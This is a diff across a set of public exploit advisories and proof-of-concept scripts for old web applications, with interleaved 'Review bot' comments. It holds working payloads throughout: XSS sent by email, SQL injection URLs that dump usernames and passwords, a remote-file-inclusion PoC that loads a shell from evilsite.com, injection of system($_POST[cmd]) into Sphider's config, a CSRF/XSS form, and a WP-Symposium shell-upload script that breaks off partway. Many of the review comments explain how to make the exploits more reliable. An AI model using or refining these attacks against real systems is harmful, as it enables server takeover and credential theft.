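Review bot: in `<img src='1.jpg'onerror=javascript:alert("XSS")>` the `javascript:` prefix inside an event handler is not a URL scheme but a JavaScript label, so it is harmless but misleading; `onerror=alert("XSS")` is the clearer form. The two payloads also differ in required interaction: the `<a href=javascript:...>` variant needs the victim to click, as the text says, while the `onerror` variant fires as soon as the HTML body is rendered, which is what the later sentence "once the user opens the message" describes; stating that contrast explicitly next to each payload would avoid confusion about which one is click-less.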
@ -38,48 +38,48 @@ Send an email to the victim with the payload in the email body, once the user op
|
|||
3. Stored XSS contacts.
|
||||
|
||||
Another stored XSS can be triggered when crating a new contact, almost every field in the form is vulnerable
|
||||
for example you can inject your payload <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")> in the \"Name\" field, Save contact, XSS Shoud be triggerd.
|
||||
for example you can inject your payload <img src='1.jpg'onerror=javascript:alert("XSS")> in the "Name" field, Save contact, XSS Shoud be triggerd.
|
||||
|
||||
4. Stored XSS in Calendar
|
||||
|
||||
Add a new event to calendar and in the message field insert the javascript payload: <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")>
|
||||
Add a new event to calendar and in the message field insert the javascript payload: <img src='1.jpg'onerror=javascript:alert("XSS")>
|
||||
Save the event, XSS Should be truggered.
|
||||
|
||||
|
||||
\'\'\'
|
||||
'''
|
||||
|
||||
import smtplib
|
||||
|
||||
print \"###############################################\"
|
||||
print \"# T-dah Webmail 3.2.0 Stored XSS POC #\"
|
||||
print \"# Coded by: Shai rod #\"
|
||||
print \"# @NightRang3r #\"
|
||||
print \"# http://exploit.co.il #\"
|
||||
print \"# For Educational Purposes Only! #\"
|
||||
print \"###############################################\\r\\n\"
|
||||
print "###############################################"
|
||||
print "# T-dah Webmail 3.2.0 Stored XSS POC #"
|
||||
print "# Coded by: Shai rod #"
|
||||
print "# @NightRang3r #"
|
||||
print "# http://exploit.co.il #"
|
||||
print "# For Educational Purposes Only! #"
|
||||
print "###############################################\r\n"
|
||||
|
||||
# SETTINGS
|
||||
|
||||
sender = \"attacker@localhost\"
|
||||
sender = "attacker@localhost"
|
||||
smtp_login = sender
|
||||
smtp_password = \"qwe123\"
|
||||
recipient = \"victim@localhost\"
|
||||
smtp_server = \"192.168.1.10\"
|
||||
smtp_password = "qwe123"
|
||||
recipient = "victim@localhost"
|
||||
smtp_server = "192.168.1.10"
|
||||
smtp_port = 25
|
||||
subject = \"T-dah Webmail XSS POC\"
|
||||
subject = "T-dah Webmail XSS POC"
|
||||
|
||||
# SEND E-MAIL
|
||||
|
||||
print \"[*] Sending E-mail to \" + recipient + \"...\"
|
||||
msg = (\"From: %s\\r\\nTo: %s\\r\\nSubject: %s\\n\"
|
||||
% (sender, \", \".join(recipient), subject) )
|
||||
msg += \"Content-type: text/html\\n\\n\"
|
||||
msg += \"\"\"<img src=\'1.jpg\'onerror=javascript:alert(\"XSS-1\")>\\r\\n\"\"\"
|
||||
msg += \"\"\"<a href=javascript:alert(\"XSS-2\")>Click Me, Please...</a>\\r\\n\"\"\"
|
||||
print "[*] Sending E-mail to " + recipient + "..."
|
||||
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
|
||||
% (sender, ", ".join(recipient), subject) )
|
||||
msg += "Content-type: text/html\n\n"
|
||||
msg += """<img src='1.jpg'onerror=javascript:alert("XSS-1")>\r\n"""
|
||||
msg += """<a href=javascript:alert("XSS-2")>Click Me, Please...</a>\r\n"""
|
||||
server = smtplib.SMTP(smtp_server, smtp_port)
|
||||
server.ehlo()
|
||||
server.starttls()
|
||||
server.login(smtp_login, smtp_password)
|
||||
server.sendmail(sender, recipient, msg)
|
||||
server.quit()
|
||||
print \"[+] E-mail sent!\"
|
||||
print "[+] E-mail sent!"
|
||||
|
|
|
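Review bot: `", ".join(recipient)` in the `To:` header is a bug: `recipient` is the string `"victim@localhost"`, so `str.join` interleaves `", "` between every character and the header becomes `v, i, c, t, i, m, ...`; either pass `[recipient]` or drop the join. The header block also mixes line endings (`\r\n` after `From:` and `To:` but `\n` after `Subject:` and `Content-type:`), and `server.starttls()` is called unconditionally, which raises on servers that do not advertise STARTTLS on port 25; guard it with `if server.has_extn('starttls'):` after `server.ehlo()`.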
@ -2,16 +2,16 @@
|
|||
# Author : By onestree
|
||||
# Software Link : http://code.google.com/p/phpshop/downloads/list
|
||||
# tested : windows 7 / ubuntu
|
||||
# Dork : inurl:\"tanyakan pada rumput yang bergoyang\"
|
||||
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
|
||||
|
||||
SQLi p0c:
|
||||
|
||||
==================
|
||||
|
||||
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11\'
|
||||
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
|
||||
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
|
||||
|
||||
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087\'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
|
||||
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
|
||||
|
||||
|
||||
|
||||
|
|
|
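Review bot: the first proof of concept is split across two lines (`...module_id=11'` and then `union select 1,database(),...`), so as written it is not one request; it should be joined into a single URL. Both URLs contain a raw space in `phpshop 2.0` that has to be sent as `%20`, and the terminators are inconsistent (` --` at the end of the first, bare `--` at the end of the second); MySQL only treats `--` as a comment when whitespace follows, so `-- -` or `%23` is the safer choice inside a URL. The two injections also use different column counts, which implies they target different statements; naming the query or table each one hits would help anyone reproducing it.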
@ -4,7 +4,7 @@
|
|||
+ Vendor ............: http://www.irokez.org/
|
||||
+ Affected Software .: Irokez CMS <= 0.7.1
|
||||
+ Download ..........: http://www.irokez.org/releases/irokez-0.7.1.zip
|
||||
+ Description .......: \"Irokez is a blogging based CMS\"
|
||||
+ Description .......: "Irokez is a blogging based CMS"
|
||||
+ Class .............: Remote File Inclusion
|
||||
+ Risk ..............: High (Remote File Execution)
|
||||
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
|
||||
|
@ -16,33 +16,33 @@
|
|||
+
|
||||
+ Vulnerable Code:
|
||||
+ scripts/gallery.scr.php, line(s) 11-12:
|
||||
+ -> 11: require_once \"{$GLOBALS[\'PTH\'][\'func\']}gallery.func.php\";
|
||||
+ -> 12: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}gallery.class.php\";
|
||||
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
|
||||
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
|
||||
+ scripts/sitemap.scr.php, line(s) 13:
|
||||
+ -> 13: include_once $GLOBALS[\'PTH\'][\'classes\'] . \'menu.class.php\';
|
||||
+ -> 13: include_once $GLOBALS['PTH']['classes'] . 'menu.class.php';
|
||||
+ scripts/news.scr.php, line(s) 11:
|
||||
+ -> 11: require_once $GLOBALS[\'PTH\'][\'classes\'] . \'news.class.php\';
|
||||
+ -> 11: require_once $GLOBALS['PTH']['classes'] . 'news.class.php';
|
||||
+ scripts/polls.scr.php, line(s) 03:
|
||||
+ -> 03: require_once $GLOBALS[\'PTH\'][\'classes\'] . \'poll.class.php\';
|
||||
+ -> 03: require_once $GLOBALS['PTH']['classes'] . 'poll.class.php';
|
||||
+ scripts/rss.scr.php, line(s) 04:
|
||||
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}news.class.php\";
|
||||
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}news.class.php";
|
||||
+ scripts/search.scr.php, line(s) 04:
|
||||
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}content.class.php\";
|
||||
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}content.class.php";
|
||||
+ scripts/xtextarea.scr.php, line(s) 03-04:
|
||||
+ -> 03: $GLOBALS[\'spaw_root\'] = $spaw_root = $GLOBALS[\'PTH\'][\'spaw\'];
|
||||
+ -> 04: require_once $GLOBALS[\'PTH\'][\'spaw\'] . \'spaw_control.class.php\';
|
||||
+ -> 03: $GLOBALS['spaw_root'] = $spaw_root = $GLOBALS['PTH']['spaw'];
|
||||
+ -> 04: require_once $GLOBALS['PTH']['spaw'] . 'spaw_control.class.php';
|
||||
+ functions/form.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
|
||||
+ functions/general.func.php, line(s) 06:
|
||||
+ -> 06: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\"; //TBL_Lang description
|
||||
+ -> 06: require_once "{$GLOBALS['PTH']['classes']}lang.class.php"; //TBL_Lang description
|
||||
+ functions/groups.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}group.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}group.class.php";
|
||||
+ functions/js.func.php, line(s) 04:
|
||||
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";
|
||||
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
|
||||
+ functions/sections.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}section.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}section.class.php";
|
||||
+ functions/users.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}user.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}user.class.php";
|
||||
+
|
||||
+ Proof Of Concept:
|
||||
+ http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
|
||||
|
|
|
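Review bot: the proof of concept `scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?` only works when PHP's `register_globals` is on (so a request parameter can populate `$GLOBALS['PTH']`) and, for a remote URL, `allow_url_include` is enabled; neither precondition is stated. The trailing `?` is there so that the `gallery.func.php` appended by `require_once "{$GLOBALS['PTH']['func']}gallery.func.php"` becomes a query string on the attacker's host instead of part of the path; a sentence saying so would let readers adapt the PoC to the other listed sinks, all of which append a fixed filename to `$GLOBALS['PTH'][...]` (`classes`, `spaw`).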
@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a
|
|||
|
||||
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,\'-\',userPassword),4,5/**/FROM/**/tbl_ln_user/*
|
||||
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
|
|
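Review bot: the PoC relies on two things that are not explained: `/**/` is used as a whitespace substitute, and `AND 1=2` empties the original result so only the `UNION ALL SELECT` row is rendered in the five displayed columns. The trailing `/*` depends on the database accepting an unterminated comment; if anything follows `cid` in the target query, `-- -` or `%23` are the conventional terminators and should be mentioned as alternatives.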
@ -1,5 +1,5 @@
|
|||
# Exploit Title: Sphider 1.3.6 or later SQL Injection
|
||||
# Google Dork: intitle:\"Sphider Admin Login\"
|
||||
# Google Dork: intitle:"Sphider Admin Login"
|
||||
# Date: 1 July 2014
|
||||
# Exploit Author: Mike Manzotti
|
||||
# Vendor Homepage: http://www.sphider.eu/
|
||||
|
@ -11,12 +11,12 @@ The web application is vulnerable to SQLi. Once a website has been indexed with
|
|||
|
||||
Proof of Concept:
|
||||
Response: POST: /admin/admin.php
|
||||
per_page=10&filter=\'union+select+1,@@version+;#&start=1&site_id=1&f=21
|
||||
per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
|
||||
|
||||
Response:
|
||||
<tr class=\"grey\">
|
||||
<td><a href=\"5.5.35-0+wheezy1\">5.5.35-0+wheezy1</a></td>
|
||||
<td width=\"8%\">
|
||||
<tr class="grey">
|
||||
<td><a href="5.5.35-0+wheezy1">5.5.35-0+wheezy1</a></td>
|
||||
<td width="8%">
|
||||
[cid:image001.jpg@01CFAA73.0B6B8330]
|
||||
|
||||
|
||||
|
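Review bot: the line `Response: POST: /admin/admin.php` is mislabelled; the body that follows (`per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21`) is the request, and the actual response starts at the second `Response:` heading. `[cid:image001.jpg@01CFAA73.0B6B8330]` is a leftover inline-image reference from the e-mail this advisory was pasted from and carries no information in text form; it should be removed or replaced with the screenshot it pointed to.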
@ -24,13 +24,13 @@ Response:
|
|||
# Exploit Title: Sphider 1.3.6 or later PHP Injection
|
||||
|
||||
Description:
|
||||
An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of \"conf.php file\". However during the installation the user is advised to change the permissions of \"conf.php\" file to chmod 666.
|
||||
An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666.
|
||||
|
||||
Proof of Concept:
|
||||
Request: POST /admin/admin.php
|
||||
f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5
|
||||
|
||||
\"system($_POST[cmd])\" has been injected.
|
||||
"system($_POST[cmd])" has been injected.
|
||||
|
||||
Request: POST http://URL/sphider/settings/conf.php
|
||||
cmd=pwd
|
||||
|
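Review bot: the version information is inconsistent: the heading says `Sphider 1.3.6 or later PHP Injection`, the description says authentication can be bypassed in v1.3.5, and the injected settings request carries `_version_nr=1.3.5`, so the version actually tested should be stated once. The description should also say where the injected value lands: `_word_upper_bound=100;system($_POST[cmd])` is written into `settings/conf.php` as PHP source, which is why the follow-up request is a POST to `conf.php` with `cmd=pwd` and why the `chmod 666` the installer recommends for `conf.php` is the precondition for the write.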
@ -49,7 +49,7 @@ Request: POST /admin/admin.php
|
|||
f=7&parent=&category=<script>alert(document.cookie)</script>
|
||||
|
||||
Response
|
||||
<a href=\"admin.php?f=edit_cat&cat_id=1\">
|
||||
<a href="admin.php?f=edit_cat&cat_id=1">
|
||||
<script>alert(document.cookie)
|
||||
</script>
|
||||
</a>
|
||||
|
@ -57,10 +57,10 @@ Response
|
|||
Reflected XSS:
|
||||
|
||||
Request: POST /sphider/admin/admin.php
|
||||
f=index&adv=1&url=\"/><script>alert(document.cookie)</script>
|
||||
f=index&adv=1&url="/><script>alert(document.cookie)</script>
|
||||
|
||||
Response:
|
||||
<a href=\"admin.php?f=edit_cat&cat_id=1\">
|
||||
<a href="admin.php?f=edit_cat&cat_id=1">
|
||||
<script>alert(document.cookie)
|
||||
</script>
|
||||
</a>
|
||||
|
|
|
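Review bot: the `Response:` block under "Reflected XSS" is identical to the one under the stored category XSS (`<a href="admin.php?f=edit_cat&cat_id=1">` followed by the script tag), although this request injects into the `url` parameter of the `f=index&adv=1` form rather than into a category name; this looks like a copy-paste and should show the real reflected context. The `"/>` prefix in the payload implies the value is echoed inside an attribute of an `<input>` tag, so the response excerpt should show that tag.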
@ -6,26 +6,26 @@ An attacker may leverage these issues to execute arbitrary script code in the br
|
|||
|
||||
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
<script type=\"text/javascript\">function xss(){document.forms[\"zappa\"].submit();}</script>
|
||||
<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>
|
||||
|
||||
<form name=\"zappa\" action=\"http://taskfreak/index.php\" method=\"POST\" id=\"zappa\">
|
||||
<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">
|
||||
|
||||
<input type=\"hidden\" name=\"sProject\" value=\"0\" />
|
||||
<input type="hidden" name="sProject" value="0" />
|
||||
|
||||
<input type=\"hidden\" name=\"id\" value=\"\" />
|
||||
<input type="hidden" name="id" value="" />
|
||||
|
||||
<input type=\"hidden\" name=\"mode\" value=\"save\" />
|
||||
<input type="hidden" name="mode" value="save" />
|
||||
|
||||
<input type=\"hidden\" name=\"sContext\" value=\'%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20\' />
|
||||
<input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />
|
||||
|
||||
<input type=\"hidden\" name=\"sort\" value=\'\"><script>alert(1)</script>\' />
|
||||
<input type="hidden" name="sort" value='"><script>alert(1)</script>' />
|
||||
|
||||
<input type=\"hidden\" name=\"dir\" value=\'\"><script>alert(2)</script>\' />
|
||||
<input type="hidden" name="dir" value='"><script>alert(2)</script>' />
|
||||
|
||||
<input type=\"hidden\" name=\"show\" value=\'\"><script>alert(3)</script>\' />
|
||||
<input type="hidden" name="show" value='"><script>alert(3)</script>' />
|
||||
|
||||
</form>
|
||||
|
||||
<a href=\"javascript: xss();\" style=\"text-decoration:none\">
|
||||
<a href="javascript: xss();" style="text-decoration:none">
|
||||
|
||||
<b><font color=\"red\"><center><h3>Exploit!<h3></center></font></b></a>
|
||||
<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>
|
||||
|
|
|
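Review bot: the `sContext` value is pre-URL-encoded (`%22%20onmouseover%3dprompt(...)`) inside an HTML form field, so the browser encodes it again on submit (`%2522...`) and the application only sees the quote and space if it URL-decodes the stored value a second time; either use the literal characters (HTML-escaped, as the `sort`, `dir` and `show` fields do with `'"><script>...`) or say that double decoding is what makes this one work. Also `<h3>Exploit!<h3>` never closes the heading and should be `<h3>Exploit!</h3>`.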
@ -8,7 +8,7 @@ TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
|
|||
|
||||
GET /taskfreak/rss.php HTTP/1.1
|
||||
|
||||
Referer: \">Waddup!
|
||||
Referer: ">Waddup!
|
||||
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
||||
|
||||
|
|
|
@ -19,39 +19,39 @@
|
|||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The upload function located on \"/wp-symposium/server/file_upload_form.php \" is protected:
|
||||
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
|
||||
#
|
||||
# if ($_FILES[\"file\"][\"error\"] > 0) {
|
||||
# echo \"Error: \" . $_FILES[\"file\"][\"error\"] . \"<br>\";
|
||||
# if ($_FILES["file"]["error"] > 0) {
|
||||
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
|
||||
# } else {
|
||||
# $allowedExts = \',\'.get_option(WPS_OPTIONS_PREFIX.\'_image_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_doc_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_video_ext\');
|
||||
# //echo \"Upload: \" . $_FILES[\"file\"][\"name\"] . \"<br>\";
|
||||
# $ext = pathinfo($_FILES[\"file\"][\"name\"], PATHINFO_EXTENSION);
|
||||
# //echo \"Extension: \" . $ext . \"<br />\";
|
||||
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
|
||||
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
|
||||
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
|
||||
# //echo "Extension: " . $ext . "<br />";
|
||||
# if (strpos($allowedExts, $ext)) {
|
||||
# $extAllowed = true;
|
||||
# } else {
|
||||
# $extAllowed = false;
|
||||
# }
|
||||
# //echo \"Type: \" . $_FILES[\"file\"][\"type\"] . \"<br>\";
|
||||
# //echo \"Size: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB<br>\";
|
||||
# //echo \"Stored in: \" . $_FILES[\"file\"][\"tmp_name\"];
|
||||
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
|
||||
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
|
||||
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
|
||||
#
|
||||
# if (!$extAllowed) {
|
||||
# echo __(\'Sorry, file type not allowed.\', WPS_TEXT_DOMAIN);
|
||||
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
|
||||
# } else {
|
||||
# // Copy file to tmp location
|
||||
# ...
|
||||
# ...
|
||||
# ...
|
||||
#
|
||||
# BUTTTTT \"/wp-symposium/server/php/index.php\" is not protected and \"/wp-symposium/server/php/UploadHandler.php\" allow any extension
|
||||
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
|
||||
#
|
||||
# The same vulnerable files are locate in \"/wp-symposium/mobile-files/server/php/\"
|
||||
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
|
||||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of \"wp-symposium\"
|
||||
# Dork google: index of "wp-symposium"
|
||||
#
|
||||
#
|
||||
# Tested on BackBox 3.x with python 2.6
|
||||
|
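Review bot: the allow-list in the "protected" `file_upload_form.php` is weak on its own: `strpos($allowedExts, $ext)` is a substring match against the comma-joined option values, so any extension that is a substring of an allowed one passes. That said, the real finding is the `BUTTTTT` line: `server/php/index.php` hands the upload to `UploadHandler.php` with no extension check at all, and `mobile-files/server/php/` is a second copy of the same handler. Quoting the relevant line of `UploadHandler.php` (the accept-file-types pattern, or its absence) rather than only asserting that it allows any extension would make the claim verifiable.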
@ -69,8 +69,8 @@ import os, os.path, mimetypes
|
|||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != \"https://\" and url[:7] != \"http://\":
|
||||
print(\'[X] You must insert http:// or https:// procotol\')
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
@ -78,62 +78,62 @@ def checkurl(url):
|
|||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print \'[X] \'+file+\' file is missing or not readable\'
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
# Get file\'s mimetype
|
||||
# Get file's mimetype
|
||||
def get_content_type(filename):
|
||||
return mimetypes.guess_type(filename)[0] or \'application/octet-stream\'
|
||||
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return \'\'.join(random.choice(chars) for _ in range(size))
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
# Create multipart header
|
||||
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
|
||||
|
||||
getfields = dict()
|
||||
getfields[\'uploader_uid\'] = \'1\'
|
||||
getfields[\'uploader_dir\'] = \'./\'+randDirName
|
||||
getfields[\'uploader_url\'] = url_symposium_upload
|
||||
getfields['uploader_uid'] = '1'
|
||||
getfields['uploader_dir'] = './'+randDirName
|
||||
getfields['uploader_url'] = url_symposium_upload
|
||||
|
||||
payloadcontent = open(payloadname).read()
|
||||
|
||||
LIMIT = \'----------lImIt_of_THE_fIle_eW_$\'
|
||||
CRLF = \'\\r\\n\'
|
||||
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
|
||||
CRLF = '\r\n'
|
||||
|
||||
L = []
|
||||
for (key, value) in getfields.items():
|
||||
L.append(\'--\' + LIMIT)
|
||||
L.append(\'Content-Disposition: form-data; name=\"%s\"\' % key)
|
||||
L.append(\'\')
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"' % key)
|
||||
L.append('')
|
||||
L.append(value)
|
||||
|
||||
L.append(\'--\' + LIMIT)
|
||||
L.append(\'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\' % (\'files[]\', randShellName+\".php\"))
|
||||
L.append(\'Content-Type: %s\' % get_content_type(payloadname))
|
||||
L.append(\'\')
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
|
||||
L.append('Content-Type: %s' % get_content_type(payloadname))
|
||||
L.append('')
|
||||
L.append(payloadcontent)
|
||||
L.append(\'--\' + LIMIT + \'--\')
|
||||
L.append(\'\')
|
||||
L.append('--' + LIMIT + '--')
|
||||
L.append('')
|
||||
body = CRLF.join(L)
|
||||
return body
|
||||
|
||||
banner = \"\"\"
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \\ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---\'
|
||||
`--- ---'
|
||||
___ ___ _______ _______ __
|
||||
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|
||||
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|
||||
|. / \\ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|
||||
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|
||||
|: |: | |: 1 |_____| |__|
|
||||
|::.|:. |::.| |::.. . |
|
||||
`--- ---`---\' `-------\'
|
||||
`--- ---`---' `-------'
|
||||
Wp-Symposium
|
||||
Sh311 Upl04d Vuln3r4b1l1ty
|
||||
v14.11
|
||||
|
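Review bot: `checkfile` uses the wrong operator: `if not os.path.isfile(file) and not os.access(file, os.R_OK)` only reports an error when the file is missing, so an existing but unreadable file passes the check and the script crashes later in `open(payloadname).read()` inside `create_body_sh3ll_upl04d`; it should be `or`. Minor: `create_body_sh3ll_upl04d` reads the module-level `url_symposium_upload`, which is assigned further down in the script, so it only works because the call happens after that assignment; passing the URL as a parameter would make the dependency explicit. The `checkurl`, `checkfile` and `id_generator` helpers are duplicated verbatim in the WP Marketplace script in this same commit, including the `procotol` typo in the error message.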
@ -151,17 +151,17 @@ banner = \"\"\"
|
|||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
\"\"\"
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser(\'usage: %prog -t URL -f FILENAME.PHP [--timeout sec]\')
|
||||
commandList.add_option(\'-t\', \'--target\', action=\"store\",
|
||||
help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\",
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option(\'-f\', \'--file\', action=\"store\",
|
||||
help=\"Insert file name, ex: shell.php\",
|
||||
commandList.add_option('-f', '--file', action="store",
|
||||
help="Insert file name, ex: shell.php",
|
||||
)
|
||||
commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\",
|
||||
help=\"[Timeout Value] - Default 10\",
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
@ -180,31 +180,31 @@ print(banner)
|
|||
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
url_symposium_upload = host+\'/wp-content/plugins/wp-symposium/server/php/\'
|
||||
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
|
||||
|
||||
content_type = \'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$\'
|
||||
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
|
||||
|
||||
randDirName = id_generator()
|
||||
randShellName = id_generator()
|
||||
|
||||
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
|
||||
|
||||
headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\',
|
||||
\'content-type\': content_type,
|
||||
\'content-length\': str(len(bodyupload)) }
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
|
||||
